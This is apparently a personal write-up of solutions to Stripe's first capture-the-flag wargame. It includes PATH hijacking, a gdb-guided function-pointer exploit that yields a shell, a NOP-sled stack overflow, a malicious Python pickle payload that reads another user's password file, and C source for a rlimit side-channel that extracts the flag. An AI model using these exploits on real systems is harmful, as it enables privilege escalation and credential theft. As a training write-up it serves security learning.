zx2c4's answers to stripe's capture the flag

Answers for https://stripe.com/blog/capture-the-flag


== level 1 ==

Link ./date to /bin/sh and set PATH to pwd.


== level 2 ==

Set the cookie to the path of level3's password.


== level 3 ==

Stack grows from high to low, so argv and envp are out, but luckily we copy into buf which is lower than fns. So, we just make a symlink to /bin/sh that's the memory location of run and then we point fns at it via negative pointer arithmatic. A little complicated so here's the steps:


level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
(gdb) break truncate_and_call
Breakpoint 1 at 0x8048780: file level03.c, line 57.
(gdb) run 1 something
Starting program: /levels/level03 1 something
Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
57      in level03.c
(gdb) n
60      in level03.c
(gdb) p &buf
$2 = (char (*)[64]) 0xffeecf7c
(gdb) p fns
$3 = (fn_ptr *) 0xffeecfec
(gdb) p (0xffeecfec-0xffeecf7c)/4
$4 = 28
(gdb) p run
$5 = {int (const char *)} 0x804875b <run>
(gdb) quit
A debugging session is active.

        Inferior 1 [process 11962] will be killed.

Quit anyway? (y or n) y
level03@ctf4:/tmp/tmp.lZLfBZODXa$ export HOME=$(pwd)
level03@ctf4:~$ ls
level03@ctf4:~$ ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')"
level03@ctf4:~$ export PATH=$(pwd):$PATH
level03@ctf4:~$ /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"
$ whoami
level04


== level 4 ==

The proportions were something along the lines of:
\x90 x 510
[shellcode]
[guessed stack location] x 500

I generated a guess, and then ran the executable in a loop, and I got a shell on the 4th or 5th loop.

Pretty standard stack overflow situation.


== level 5 ==

Good old python unpickling exploit.

some-string;job: [malicious picked code][line break]

For the pickled code I just put:
	cos\nsystem\n(S'cat /home/level06/.password > /tmp/asdffnnnnn'\ntR.


== level 6 ==

My first idea was rlimiting fork, so that fork would fail and return... oh, wait, negative one, shucks. So no easy points. Luckily though you write to stderr which is unbuffered by default. I played with filling up pipes first to the max, and then sockets, but each of these were a bit annoying. So I went back to the rlimit idea -- but this time for file size. I can deliver a signal when the file gets to be a certain size, and then check whether or not the process had forked the echo. Worked like a charm. Source:

#include <sys/time.h>
#include <sys/resource.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <sys/wait.h>
#include <sys/stat.h>


int teststr(const char *str)
{
	int out[2];
	pipe2(out, O_NONBLOCK);

	int child;
	if ((child = fork())) {
		wait(0);
		char in_out = 0;
		int count = 0;
		int status;
		while ((status = read(out[0], &in_out, 1)) < 0 && count < 10000)
			++count;
		return status == 1;
	} else {
		dup2(out[1], 1);

		int file = creat("./tmp", S_IWUSR | S_IRUSR);
		fcntl(file, F_SETFL, fcntl(file, F_GETFL) & ~O_NONBLOCK);
		dup2(file, 2);

		struct rlimit limit;
		getrlimit(RLIMIT_FSIZE, &limit);
		limit.rlim_cur = 33 + strlen(str);
		setrlimit(RLIMIT_FSIZE, &limit);

		char buffer[4096];
		snprintf(buffer, 4096, "%s~", str);

		execl("/levels/level06", "level06", "/home/the-flag/.password", buffer, NULL);
	}
}


int main(int argc, char *argv[])
{

	char buffer[1024];
	memset(buffer, 0, 1024);

	int i;
	for (i = 0; i < 1024; ++i) {
		char c = 32;
		do {
			buffer[i] = c;
			++c;
		} while (teststr(buffer) && c < 126);
		printf("%s\n", buffer);
	}

	return 0;
}


== the flag ==
theflagl0eFTtT5oi0nOTxO5